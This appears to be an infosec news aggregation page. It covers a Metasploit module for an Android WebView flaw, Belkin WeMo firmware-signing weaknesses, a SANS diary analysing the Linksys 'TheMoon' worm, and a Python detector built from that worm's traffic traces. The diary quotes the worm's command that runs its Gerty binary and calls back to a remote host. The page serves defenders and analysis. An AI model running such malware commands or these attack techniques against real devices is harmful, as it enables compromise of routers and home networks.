Information Security News
Recently-released attack code exploiting a critical Android vulnerability gives attackers a point-and-click interface for hacking a majority of smartphones and tablets that run the Google operating system, its creators said.
The attack was published last week as a module to the open-source Metasploit exploit framework used by security professionals and hackers alike. The code exploits a critical bug in Android's WebView programming interface that was disclosed 14 months ago. The security hole typically gives attackers remote access to a phone's camera and file system and in some cases also exposes other resources, such as geographic location data, and contents of SD cards and address books. Google patched the vulnerability in November with the release of Android 4.2, but according to the company's figures, the fix is installed on well under half of the handsets it tracks.
"This vulnerability is kind of a huge deal," Tod Beardsley, a researcher for Metasploit maintainer Rapid7, wrote in a recent blog post. "I'm hopeful that by publishing an E-Z-2-Use Metasploit module that exploits it, we can maybe push some vendors toward ensuring that single-click vulnerabilities like this don't last for 93+ weeks in the wild. Don't believe me that this thing is that old? Just take a look at the module's references if you don't believe me."
Security researchers have taken the unusual step of recommending that people stop using Belkin's WeMo home automation products after uncovering a variety of vulnerabilities that attackers can exploit to take control of home networks, thermostats, or other connected devices.
WeMo products allow people to use smartphones and computers to remotely control light switches, Web cams, motion sensors, and other home appliances. Now the items are exposing the password and cryptographic signing key used to ensure that firmware updates are valid, according to an advisory published Tuesday by researchers from security firm IOActive. Attackers can use the credentials to bypass WeMo security checks and sign malicious firmware that masquerades as an official release from Belkin.
WeMo devices also fail to validate Secure Sockets Layer (SSL) certificates when connecting to Belkin servers, even when the devices are running firmware that's fully up-to-date. What's more, firmware update notices are delivered through handsets or computers paired with the WeMo products and use a non-encrypted channel. IOActive Principal Research Scientist Mike Davis said he was able to combine exploits for those weaknesses into an attack that spoofed the RSS feed Belkin uses to push firmware updates to WeMo products. The counterfeit feeds, in turn, surreptitiously infected the devices with malware.
Using a vulnerable Linksys E1200 router in a lab, I was finally able to capture the complete (?) sequence of exploits used by the Linksys Worm "TheMoon".
The quick summary of what I found so far:
I did not see any configuration changes in the router (password, DNS...)
As we wrote earlier, the initial "HNAP1" request is just used to fingerprint the router to figure out if it is vulnerable.
The worm sends a number of DNS queries:
The "Gerty" binary checks in with the host the infection comes from. The ports are sent as parameters. In my case, the complete command was:
cd /tmp/;./Gerty -L 22.214.171.124:8080:9841 -u xxxxxx
As a result, the connection went to port 9841 at 126.96.36.199. About 1.4MBytes are sent, most of it binary. But there are a few readable strings like a timestamp, the SSID of the router and the string "Lunar Industries LTD".
For a full pcap of the activity, see https://isc.sans.edu/diaryimages/moon.pcap . I tried to anonymize the pcap as much as possible, but some of the IPs were left intact. If you find anything else, please let me know. Note that the pcap includes a capture of the binary file as well (look for the http traffic on port 700). To protect others, I redirected all outbound port 80/8080 traffic to a sinkhole which may cause some artifacts.
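The diary above lists several observable traces of the worm's activity: the HNAP1 fingerprint request, the Gerty binary being fetched over HTTP on port 700, the outbound check-in to port 9841, and the "Lunar Industries LTD" string in that check-in traffic. The following detector is an added example, not code from the diary or from SANS ISC: it turns those traces into simple log-based indicators and runs them over a few constructed key=value connection-log lines. The log format, the RFC 5737 documentation addresses and the "router only talks HNAP1 to LAN clients" assumption are all mine, not something the diary states.

```python
"""Log-based indicators for the TheMoon activity described in the diary.

Added example (not from the SANS ISC diary). It scans constructed
connection-log lines for the traces the diary reports and reports which
were seen for a given router address.
"""
import ipaddress
import re

# Constructed sample log (not taken from the diary's pcap). Key=value format
# loosely modelled on router/firewall logs; 192.0.2.1 stands in for the
# infected router and 198.51.100.7 for the host the infection came from.
SAMPLE_LOG = """\
2014-02-16T10:00:01 src=198.51.100.7 dst=192.0.2.1 dport=80 uri=/HNAP1/
2014-02-16T10:00:03 src=192.0.2.1 dst=198.51.100.7 dport=700 uri=/Gerty
2014-02-16T10:00:04 src=192.0.2.1 dst=198.51.100.7 dport=9841 bytes=1400000
2014-02-16T10:00:05 src=192.0.2.1 dst=198.51.100.7 dport=9841 payload="Lunar Industries LTD"
2014-02-16T10:00:06 src=10.0.0.5 dst=192.0.2.1 dport=80 uri=/index.html
"""

# Indicator names and what each one means, drawn from the diary's observations.
INDICATORS = {
    "hnap1_fingerprint_from_wan": "HNAP1 request to the router from a non-RFC1918 source",
    "binary_fetch_port_700": "router fetching a file over HTTP on port 700",
    "gerty_callback_9841": "router connecting out to port 9841 (Gerty check-in)",
    "lunar_industries_marker": "'Lunar Industries LTD' string seen in traffic",
}

_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_line(line):
    """Split one key=value log line into a dict; the leading token is the timestamp."""
    fields = {k: v.strip('"') for k, v in _FIELD_RE.findall(line)}
    fields["ts"] = line.split(" ", 1)[0]
    return fields


def is_rfc1918(addr):
    """True for private (LAN) addresses. Explicit list because Python's
    ip_address.is_private also treats the RFC 5737 test ranges as private."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in _RFC1918)


def detect_themoon(log_text, router_ip):
    """Return {indicator: sorted peer addresses} for traces seen against router_ip."""
    hits = {}
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        src, dst = ev.get("src"), ev.get("dst")
        dport = int(ev.get("dport", 0))
        uri = ev.get("uri", "")
        # Fingerprint: HNAP1 probe reaching the router from outside the LAN.
        # Assumption: legitimate HNAP1 clients (management software) are on the LAN.
        if dst == router_ip and uri.startswith("/HNAP1") and src and not is_rfc1918(src):
            hits.setdefault("hnap1_fingerprint_from_wan", set()).add(src)
        # Post-exploitation: the router itself reaching out on the diary's ports.
        if src == router_ip and dport == 700:
            hits.setdefault("binary_fetch_port_700", set()).add(dst)
        if src == router_ip and dport == 9841:
            hits.setdefault("gerty_callback_9841", set()).add(dst)
        # Content marker from the check-in traffic.
        if "Lunar Industries LTD" in raw:
            hits.setdefault("lunar_industries_marker", set()).add(dst or "?")
    return {k: sorted(v) for k, v in hits.items()}


def verdict(hits):
    """Flag only when the fingerprint is followed by at least one post-exploitation trace,
    so a lone HNAP1 probe (scanning noise) does not raise an alert by itself."""
    post = {"binary_fetch_port_700", "gerty_callback_9841", "lunar_industries_marker"}
    return "hnap1_fingerprint_from_wan" in hits and bool(post & hits.keys())


if __name__ == "__main__":
    found = detect_themoon(SAMPLE_LOG, "192.0.2.1")
    for name, peers in found.items():
        print(f"{name}: {INDICATORS[name]} -> {', '.join(peers)}")
    print("TheMoon activity likely:", verdict(found))
```

The WAN-source condition on the HNAP1 rule is a design choice, not something the diary says: HNAP1 is also used by legitimate management software on the LAN, so the fingerprint alone is weak evidence and `verdict` only fires when it is paired with one of the outbound traces.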
Why vulnerability scans give infosec officers nightmares
Computer Business Review
By Duncan MacRae | 18 February 2014. Ron Gula, Tenable Network Security CEO, says organisations are turning to continuous monitoring to close the gaps left by traditional vulnerability ...
Posted by InfoSec News on Feb 18
http://online.wsj.com/news/articles/SB10001424052702304899704579389171658671940?mg=reno64-wsj&url=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304899704579389171658671940.html